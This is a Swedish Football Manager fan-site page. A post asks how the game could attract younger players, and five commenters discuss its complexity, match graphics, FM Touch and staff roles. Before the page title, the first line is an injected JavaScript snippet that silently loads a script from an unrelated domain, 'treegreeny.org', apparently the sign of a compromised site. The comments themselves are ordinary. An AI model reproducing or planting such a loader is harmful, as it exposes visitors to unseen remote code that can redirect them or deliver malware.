;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hur ska Football Manager fånga den unga publiken? – FMSweden
Meny Stäng

Hur ska Football Manager fånga den unga publiken?

En fråga till alla FM-spelare där ute!

Vad tycker ni borde göras för att locka den yngre generationen till att börja spela Football Manager? Vad behöver ändras? Är det för krångligt att starta upp ett nytt lir? Är det för avancerat? För dålig grafik?

Ge oss svar!

Please wait...

Liknande Inlägg

5 kommentarer

  1. raca14

    Skriver ungefär det som jag redan skrivit inne på fb.

    För någon som aldrig spelat FM tidigare, så är det väldigt avancerat och mycket att hålla koll på. Visst kan man delegera uppgifter, men då blir ju frågan vad och vem ska delegeras…
    Så som det var för något år sedan med en möjlighet till att köra mer classic kanske skulle kunna vara något.

  2. MusicManVic

    Ja, en bra inkörsport är ju FM Touch eller vad det nu kallas?
    Sen tror jag ändå framtiden måste vara att få bättre grafik i matchmotorn, få in skillmoves etc. Just nu ser det fortfarande rätt platt ut, speciellt för någon som är van vid fetare grafik i FIFA osv. Min flickvän brukar garva åt FM och kalla det för text-tv-fotboll från 90-talet efter att ha sett några matcher…

  3. trofast

    Är 18 år och mitt första FM var 19 som jag köpte som 14/15-åring.
    Detta enda jag ångrar var att jag inte köpte det tidigare.

    Jag ser absolut inte “grafiken” som ett problem, för att för mig är det lite charmen med spelet. Det ska inte vara som FIFA, och det handlar inte om matchgrafiken, utan om helheten. Statistiken, sitta i minuter/timmar för att skapa en taktik, som i slutändan går åt helvete och sen spendera ännu mer tid på den. Att scouta spelare och värva/sälja för att förbättra sitt lag, kolla igenom färdigheter och stastiska resultat. Få fram en ung talang för att sedan utveckla honom till en av de bästa i världen. Det är detta FM handlar om för mig. Givetvis matchgrafiken också, men för mig är det helheten som gör FM till det spel det är, där matchgrafiken spelar mindre roll för mig.

    Möjligtvis hade FM kunnat göra det snyggare, men då blir det å andra sidan helt plöstligt större krav på hårdvara, vilket sedermera gör det svårare för gemene man att kunna njuta av spelet.

    Jag tror såklart att det finns förbättringar att göra för att få mer yngre spelare. Men samtidigt slår de varje år nya rekord i spelarantal. Det jag tror är viktigast är marknadsföringen. Att verkligen nå ut till unga och få de förstå glädjen med spelet.

  4. Dino

    Svårt att se spelet ur ett nybörjarperspektiv om man lirat av och till i drygt 20 år men gör ett försök.

    Grafiken ser jag inga problem med, det är snarare en styrka att man kan spela även på enklare datorer.
    Menyerna osv. är helt okej och effektiva med standardskin.
    Kanske ska utvecklarna vara ännu tydligare med att det man ser i matcherna är en visualisering av alla beräkningar som görs löpande i bakgrunden, jag sitter själv och svär åt spelare som “står och tittar på” när motståndarna tar andrabollen och kontrar eller när min spelare tar ett onödigt rött när det egentligen handlar om nåt annat än det som presenteras. Förstår om en kräsen nybörjare tröttnar på såna grejer. Hellre att de får flyt i smågrejerna innan de inför ex. avancerade (visuella) finter.

    Tycker för övrigt att det spårat ur med “staff roles” där man ska hålla koll på en jäkla massa roller både vad gäller läkekonst och analytiker till tre olika lag. Jag har nog inte varit uppmärksam men orkar inte sätta mig in i flera av de rollerna utan det blir bara ett nödvändigt ont att personalsöka med egenskaps-mallen och hoppas på det bästa. Varför betala någon tre ggr så mycket lön när egenskaper och rykte är liknande? Mycket jag inte förstår där. Man får så mycket känsla för allt annat i spelet men den delen är en gråzon som jag inte orkar bry mig om, hur ska en normalt funtad 12-åring då fastna undrar jag.
    Att be någon ur personalen sköta kontrakten för de rollerna är ingen höjdare heller, de anställer på konstiga premisser och höjer inte ribban i klubben som man gör själv när man filtrerar fram den bästa tillgängliga personalen.

  5. Deadwood

    Nu minns jag inte exakt hur bilden blir när man startar nytt spel – men väl i det läget så ska man välja HUR man vill spela spelet.

    En version av FM Touch ska vara ett av dessa alternativ där det mer eller mindre är FIFA Manager man spelar, du väljer ett lag och får förslag på taktikerna för dessa lag, du värvar och säljer spelare inom din budget och spelar. Enkelt.

    Sen gradvis kan man växla upp hur mycket spelet ska baka in i din upplevelse och där det högsta steget är de facto den version vi spelar och vill spela.

    Jag tror att inlärningskurvan blir plattare och det kan locka mer nya spelare.

    Själv lirade jag Premier Manager 98 som 8åring (tog en annan väg än ni andra) – det spelet var enkelt och navigera och spela, till och med jag kunde knappa mig igenom spelet någolunda även om jag inte fattade något.

    Idag skulle det vara totalt omöjligt, bara en annan kan sitta och svära över alla truppregler inför olika slutspel som drar igång och annat som behöver min faktiska uppmärksamhet.

Lämna ett svar